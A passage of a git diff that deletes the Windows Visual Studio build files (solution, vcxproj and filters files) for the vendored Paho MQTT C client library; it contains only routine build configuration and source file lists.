-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <Text Include="ReadMe.txt" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\MQTTVersion.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj.user
deleted file mode 100644
index ef5ff2a..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj.user
+++ /dev/null
@@ -1,4 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <PropertyGroup />
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/Paho C MQTT APIs.sln b/thirdparty/paho.mqtt.c/Windows Build/Paho C MQTT APIs.sln
deleted file mode 100644
index 6b5fcb1..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/Paho C MQTT APIs.sln
+++ /dev/null
@@ -1,155 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio 15
-VisualStudioVersion = 15.0.26228.9
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "paho-mqtt3c", "paho-mqtt3c\paho-mqtt3c.vcxproj", "{172F8995-C780-44A1-996C-C7949B4DB35A}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "paho-mqtt3a", "paho-mqtt3a\paho-mqtt3a.vcxproj", "{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "paho-cs-sub", "stdoutsub\stdoutsub.vcxproj", "{DFDF6238-DA97-4474-84C2-D313E8B985AE}"
-	ProjectSection(ProjectDependencies) = postProject
-		{172F8995-C780-44A1-996C-C7949B4DB35A} = {172F8995-C780-44A1-996C-C7949B4DB35A}
-	EndProjectSection
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "paho-cs-pub", "stdoutsuba\stdoutsuba.vcxproj", "{AF322561-C692-43D3-8502-CC1E6CD2869A}"
-	ProjectSection(ProjectDependencies) = postProject
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9} = {B479B6EF-787D-4716-912A-E0F6F7BDA7A9}
-	EndProjectSection
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MQTTVersion", "MQTTVersion\MQTTVersion.vcxproj", "{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "paho-mqtt3as", "paho-mqtt3as\paho-mqtt3as.vcxproj", "{DEF21D1B-CB65-4A78-805F-CF421249EB83}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "paho-mqtt3cs", "paho-mqtt3cs\paho-mqtt3cs.vcxproj", "{17F07F98-AA5F-4373-9877-992A341D650A}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test1", "test1\test1.vcxproj", "{4E643090-289D-487D-BCA8-685EA2210480}"
-	ProjectSection(ProjectDependencies) = postProject
-		{172F8995-C780-44A1-996C-C7949B4DB35A} = {172F8995-C780-44A1-996C-C7949B4DB35A}
-	EndProjectSection
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test3", "test3\test3.vcxproj", "{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test4", "test4\test4.vcxproj", "{29D6A4E9-5A39-4CD3-8A24-348A34832405}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test5", "test5\test5.vcxproj", "{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test9", "test9\test9.vcxproj", "{D133C05E-87A6-48C6-A703-188A83B82400}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test2", "test2\test2.vcxproj", "{A4E14611-05DC-40A1-815B-DA30CA167C9B}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Win32 = Debug|Win32
-		Debug|x64 = Debug|x64
-		Release|Win32 = Release|Win32
-		Release|x64 = Release|x64
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Debug|Win32.ActiveCfg = Debug|Win32
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Debug|Win32.Build.0 = Debug|Win32
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Debug|x64.ActiveCfg = Debug|x64
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Debug|x64.Build.0 = Debug|x64
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Release|Win32.ActiveCfg = Release|Win32
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Release|Win32.Build.0 = Release|Win32
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Release|x64.ActiveCfg = Release|x64
-		{172F8995-C780-44A1-996C-C7949B4DB35A}.Release|x64.Build.0 = Release|x64
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Debug|Win32.ActiveCfg = Debug|Win32
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Debug|Win32.Build.0 = Debug|Win32
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Debug|x64.ActiveCfg = Debug|x64
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Debug|x64.Build.0 = Debug|x64
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Release|Win32.ActiveCfg = Release|Win32
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Release|Win32.Build.0 = Release|Win32
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Release|x64.ActiveCfg = Release|x64
-		{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}.Release|x64.Build.0 = Release|x64
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Debug|Win32.ActiveCfg = Debug|Win32
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Debug|Win32.Build.0 = Debug|Win32
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Debug|x64.ActiveCfg = Debug|x64
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Debug|x64.Build.0 = Debug|x64
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Release|Win32.ActiveCfg = Release|Win32
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Release|Win32.Build.0 = Release|Win32
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Release|x64.ActiveCfg = Release|x64
-		{DFDF6238-DA97-4474-84C2-D313E8B985AE}.Release|x64.Build.0 = Release|x64
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Debug|Win32.ActiveCfg = Debug|Win32
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Debug|Win32.Build.0 = Debug|Win32
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Debug|x64.ActiveCfg = Debug|x64
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Debug|x64.Build.0 = Debug|x64
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Release|Win32.ActiveCfg = Release|Win32
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Release|Win32.Build.0 = Release|Win32
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Release|x64.ActiveCfg = Release|x64
-		{AF322561-C692-43D3-8502-CC1E6CD2869A}.Release|x64.Build.0 = Release|x64
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Debug|Win32.ActiveCfg = Debug|Win32
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Debug|Win32.Build.0 = Debug|Win32
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Debug|x64.ActiveCfg = Debug|x64
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Debug|x64.Build.0 = Debug|x64
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Release|Win32.ActiveCfg = Release|Win32
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Release|Win32.Build.0 = Release|Win32
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Release|x64.ActiveCfg = Release|x64
-		{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}.Release|x64.Build.0 = Release|x64
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Debug|Win32.ActiveCfg = Debug|Win32
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Debug|Win32.Build.0 = Debug|Win32
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Debug|x64.ActiveCfg = Debug|x64
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Debug|x64.Build.0 = Debug|x64
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Release|Win32.ActiveCfg = Release|Win32
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Release|Win32.Build.0 = Release|Win32
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Release|x64.ActiveCfg = Release|x64
-		{DEF21D1B-CB65-4A78-805F-CF421249EB83}.Release|x64.Build.0 = Release|x64
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Debug|Win32.ActiveCfg = Debug|Win32
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Debug|Win32.Build.0 = Debug|Win32
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Debug|x64.ActiveCfg = Debug|x64
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Debug|x64.Build.0 = Debug|x64
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Release|Win32.ActiveCfg = Release|Win32
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Release|Win32.Build.0 = Release|Win32
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Release|x64.ActiveCfg = Release|x64
-		{17F07F98-AA5F-4373-9877-992A341D650A}.Release|x64.Build.0 = Release|x64
-		{4E643090-289D-487D-BCA8-685EA2210480}.Debug|Win32.ActiveCfg = Debug|Win32
-		{4E643090-289D-487D-BCA8-685EA2210480}.Debug|Win32.Build.0 = Debug|Win32
-		{4E643090-289D-487D-BCA8-685EA2210480}.Debug|x64.ActiveCfg = Debug|x64
-		{4E643090-289D-487D-BCA8-685EA2210480}.Debug|x64.Build.0 = Debug|x64
-		{4E643090-289D-487D-BCA8-685EA2210480}.Release|Win32.ActiveCfg = Release|Win32
-		{4E643090-289D-487D-BCA8-685EA2210480}.Release|Win32.Build.0 = Release|Win32
-		{4E643090-289D-487D-BCA8-685EA2210480}.Release|x64.ActiveCfg = Release|x64
-		{4E643090-289D-487D-BCA8-685EA2210480}.Release|x64.Build.0 = Release|x64
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Debug|Win32.ActiveCfg = Debug|Win32
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Debug|Win32.Build.0 = Debug|Win32
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Debug|x64.ActiveCfg = Debug|x64
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Debug|x64.Build.0 = Debug|x64
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Release|Win32.ActiveCfg = Release|Win32
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Release|Win32.Build.0 = Release|Win32
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Release|x64.ActiveCfg = Release|x64
-		{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}.Release|x64.Build.0 = Release|x64
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Debug|Win32.ActiveCfg = Debug|Win32
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Debug|Win32.Build.0 = Debug|Win32
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Debug|x64.ActiveCfg = Debug|x64
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Debug|x64.Build.0 = Debug|x64
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Release|Win32.ActiveCfg = Release|Win32
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Release|Win32.Build.0 = Release|Win32
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Release|x64.ActiveCfg = Release|x64
-		{29D6A4E9-5A39-4CD3-8A24-348A34832405}.Release|x64.Build.0 = Release|x64
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Debug|Win32.ActiveCfg = Debug|Win32
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Debug|Win32.Build.0 = Debug|Win32
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Debug|x64.ActiveCfg = Debug|x64
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Debug|x64.Build.0 = Debug|x64
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Release|Win32.ActiveCfg = Release|Win32
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Release|Win32.Build.0 = Release|Win32
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Release|x64.ActiveCfg = Release|x64
-		{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}.Release|x64.Build.0 = Release|x64
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Debug|Win32.ActiveCfg = Debug|Win32
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Debug|Win32.Build.0 = Debug|Win32
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Debug|x64.ActiveCfg = Debug|Win32
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Release|Win32.ActiveCfg = Release|Win32
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Release|Win32.Build.0 = Release|Win32
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Release|x64.ActiveCfg = Release|x64
-		{D133C05E-87A6-48C6-A703-188A83B82400}.Release|x64.Build.0 = Release|x64
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Debug|Win32.ActiveCfg = Debug|Win32
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Debug|Win32.Build.0 = Debug|Win32
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Debug|x64.ActiveCfg = Debug|Win32
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Release|Win32.ActiveCfg = Release|Win32
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Release|Win32.Build.0 = Release|Win32
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Release|x64.ActiveCfg = Release|x64
-		{A4E14611-05DC-40A1-815B-DA30CA167C9B}.Release|x64.Build.0 = Release|x64
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj
deleted file mode 100644
index da018c8..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj
+++ /dev/null
@@ -1,202 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{B479B6EF-787D-4716-912A-E0F6F7BDA7A9}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>pahomqtt3a</RootNamespace>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3A_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3A_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3A_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3A_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c" />
-    <ClCompile Include="..\..\src\Heap.c" />
-    <ClCompile Include="..\..\src\LinkedList.c" />
-    <ClCompile Include="..\..\src\Log.c" />
-    <ClCompile Include="..\..\src\Messages.c" />
-    <ClCompile Include="..\..\src\MQTTAsync.c" />
-    <ClCompile Include="..\..\src\MQTTPacket.c" />
-    <ClCompile Include="..\..\src\MQTTPacketOut.c" />
-    <ClCompile Include="..\..\src\MQTTPersistence.c" />
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c" />
-    <ClCompile Include="..\..\src\MQTTProtocolClient.c" />
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c" />
-    <ClCompile Include="..\..\src\MQTTVersion.c" />
-    <ClCompile Include="..\..\src\Socket.c" />
-    <ClCompile Include="..\..\src\SocketBuffer.c" />
-    <ClCompile Include="..\..\src\SSLSocket.c" />
-    <ClCompile Include="..\..\src\StackTrace.c" />
-    <ClCompile Include="..\..\src\Thread.c" />
-    <ClCompile Include="..\..\src\Tree.c" />
-    <ClCompile Include="..\..\src\utf-8.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\Clients.h" />
-    <ClInclude Include="..\..\src\Heap.h" />
-    <ClInclude Include="..\..\src\LinkedList.h" />
-    <ClInclude Include="..\..\src\Log.h" />
-    <ClInclude Include="..\..\src\Messages.h" />
-    <ClInclude Include="..\..\src\MQTTAsync.h" />
-    <ClInclude Include="..\..\src\MQTTClient.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-    <ClInclude Include="..\..\src\MQTTPacket.h" />
-    <ClInclude Include="..\..\src\MQTTPacketOut.h" />
-    <ClInclude Include="..\..\src\MQTTPersistence.h" />
-    <ClInclude Include="..\..\src\MQTTPersistenceDefault.h" />
-    <ClInclude Include="..\..\src\MQTTProtocol.h" />
-    <ClInclude Include="..\..\src\MQTTProtocolClient.h" />
-    <ClInclude Include="..\..\src\MQTTProtocolOut.h" />
-    <ClInclude Include="..\..\src\Socket.h" />
-    <ClInclude Include="..\..\src\SocketBuffer.h" />
-    <ClInclude Include="..\..\src\SSLSocket.h" />
-    <ClInclude Include="..\..\src\StackTrace.h" />
-    <ClInclude Include="..\..\src\Thread.h" />
-    <ClInclude Include="..\..\src\Tree.h" />
-    <ClInclude Include="..\..\src\utf-8.h" />
-    <ClInclude Include="..\paho-mqtt3c\stdafx.h" />
-    <ClInclude Include="..\paho-mqtt3c\targetver.h" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj.filters
deleted file mode 100644
index b142753..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj.filters
+++ /dev/null
@@ -1,153 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\utf-8.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Heap.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\LinkedList.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Log.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Messages.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacketOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistence.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
